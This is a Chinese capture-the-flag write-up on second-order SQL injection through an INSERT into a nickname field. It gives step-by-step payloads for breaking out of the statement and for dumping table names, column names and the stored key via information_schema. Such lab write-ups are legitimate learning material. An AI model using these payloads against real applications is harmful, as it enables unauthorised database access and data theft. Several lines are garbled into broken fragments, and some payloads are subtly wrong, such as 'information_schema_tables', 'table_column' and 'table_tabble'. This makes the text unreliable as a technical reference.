这题是二次注入的
二次注入的关键是要把填写的信息注入到存储里
大概的数据库模式是 insert into table_name(id,name) value (‘
i
d
′
,
′
id','
id′,′name’)
看回题目
一、判断
这里看存储型的话,之前我能想到的都是XSS,现在考虑insert注入,因此用单引号(失败)测试,再接着使用双引号(这次是成功),发现漏洞子昵称框内。
二、判断注入类型
注入一:1’,‘2’)# 注入失败
再猜,发现id和时间now()自动生成,因此觉得注入函数应该为
insert into tabel_name(1,2,3,4)value (null,‘
i
d
′
,
′
id','
id′,′name’,now())
注入二:2’,‘3’,4)# 注入成功并发现注入点在2和3
三、正式注入
主要注入模块2’,‘3’,4)# 把2或3替换掉
1.爆表名
concat(0x7e,(select concat(table_name)from information_schema_tables where table_schema=database() limit 0,1))
concat(0x7e,(select concat(table_name)from information_schema_tables where table_schema=database() limit 1,1))
得到表名key
2.爆列名
concat(0x7e,(select concat(table_column)from information_schema_columns where table_tabble=‘key’ limit 0,1))
列名id,key
3.爆数据
concat(0x7e,(select concat(key
)from key
where id=1 ))
这题尝试到id=12的时候能出答案
PS:值得注意的一点是,在最后读取key的内容时,无论是concat中的key还是from后面的key,都是使用反引号括起来的,而不是单引号,这是为什么呢?
加反引号是因为有时候定义的表名或者字段名时与系统关键字发生冲突,所以才用反引号引起来,如果能确保不使用关键字就可以不用反引号。而我们实验中的key,正好时mysql自身的一个关键字。所以需要用反引号括起来